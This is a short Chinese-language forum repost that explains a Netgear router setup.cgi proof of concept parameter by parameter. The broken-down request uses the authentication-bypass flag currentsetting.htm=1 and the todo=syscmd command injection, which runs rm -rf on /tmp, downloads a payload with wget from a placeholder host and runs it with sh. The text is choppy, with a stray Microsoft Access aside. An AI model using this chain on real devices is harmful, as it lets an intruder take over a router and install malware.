部分内容参考自:Poc整体参考示例:
https://blog.csdn.net/li371518473/article/details/128527613 https://blog.csdn.net/weixin_35509395/article/details/119636901
“setup.cgi” 文件一样平常作为安装工具利用,可以通过编辑此文件进行安装对应系统。然后,通过 todo 命令执行 syscmd,
todo是一个特殊的标志,用于标识需要实现但现在还未实现的功能.最后,通过 syscmd 来执行下载和执行病毒的命令。
使⽤SysCmd⽅法可以:在状态栏中显⽰进度表或可选的指定⽂本,返回有关 Microsoft Access 及其关联⽂件的信息,或返回指定数据库对象的状态“cmd=rm+-rf+/tmp/*”
表示删除/tmp文件夹下所有内容。“wget+http://x.x.x.x:x/example+-o+/tmp/netgear”
表示:下载网址“http://x.x.x.x:x/” 下example夹内的内容 至 特定的文件夹 “/tmp/netgear” 下。
《本文原创地点:https://www.cnblogs.com/--l-/p/18214651,码字不易,转载请注明出处。》sh+netgear
通过 “sh” 脚本命令执行 "netgear"文件(已下载exp)curpath=/
切换当前脚本路径为根目录/currentsetting.htm=1
currentsetting.htm字段会触发一个判定标志,这个标志=1会直接使判定通过。作用结果:绕过访问验证机制。总结与收获:
欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) | Powered by Discuz! X3.4 |